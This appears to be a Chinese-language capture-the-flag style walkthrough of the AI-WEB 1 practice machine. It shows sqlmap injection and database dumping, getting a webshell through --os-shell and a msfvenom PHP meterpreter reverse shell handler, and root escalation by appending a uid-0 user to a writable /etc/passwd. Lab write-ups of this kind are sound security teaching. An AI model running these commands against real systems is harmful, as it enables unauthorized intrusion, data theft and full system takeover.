红队专项·AI-WEB 1
字数 1025 2025-08-10 20:57:54
AI-WEB 1 靶机渗透测试教学文档
靶机概述
- 难度等级:中级
- 目标:获取root权限并找到flag.txt
- 环境:自行搭建的渗透测试环境
- 重要提示:本文技术仅用于合法授权测试,非法使用后果自负
信息收集阶段
网络扫描
- 使用桥接模式连接靶机网络
- 使用
arp-scan确定目标IP地址 - 使用
nmap扫描开放端口和服务
Web服务探测
- 发现开放80端口HTTP服务
- 探测到
robots.txt文件,包含路径信息 - 发现可访问路径
/se3,具有数据查询功能
渗透攻克阶段
SQL注入攻击
- 使用
sqlmap工具进行自动化注入测试 - 分步操作:
- 爆数据库名:
--current-db - 爆表名:
--tables -D "xxxx" - 爆字段名:
--columns -T xxxx -D xxxxx - 导出数据:
-D xxxxx --dump-all --batch
- 爆数据库名:
获取Webshell的三种方法
方法一:利用os-shell写webshell
- 前提条件:
- 具有FILE权限
- 知道网站绝对路径
- GPC为off(PHP主动转义功能关闭)
- 执行命令:
sqlmap -r post.txt --os-shell - 通过上传页面反弹shell
方法二:file-dest写入木马
- 使用msfvenom生成PHP webshell
- 设置Metasploit监听:
use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 172.46.229.39 set lport 1234 - 通过sqlmap写入webshell
方法三:通过os-shell上传页面直接上传webshell
权限提升阶段
查找可写文件
- 查找可写目录:
find / -writable -type d 2>/dev/null - 查找可写文件:
find / -writable -type f 2>/dev/null
利用/etc/passwd可写漏洞
- 发现www-data用户对/etc/passwd有写权限
- 生成加密密码:
perl -le 'print crypt("1q2w3e4r","salt")' - 添加特权用户:
echo "wIngy:saPxWonD/gnR6:0:0:hacker:/root:/bin/bash" >> /etc/passwd - 切换用户:
su wIngy
技术总结
- 完整渗透流程:信息收集→漏洞利用→获取初始访问→权限提升
- 关键工具使用:arp-scan、nmap、sqlmap、msfvenom
- 重要技术点:SQL注入、Webshell上传、特权文件篡改
注意事项
- 实战中不建议使用
--dump-all,应针对性获取数据 - 多种获取Webshell的方法可根据实际情况选择
- 权限提升前应先全面收集系统信息
相关标签
#渗透测试 #工具使用 #红队 #SQL注入 #权限提升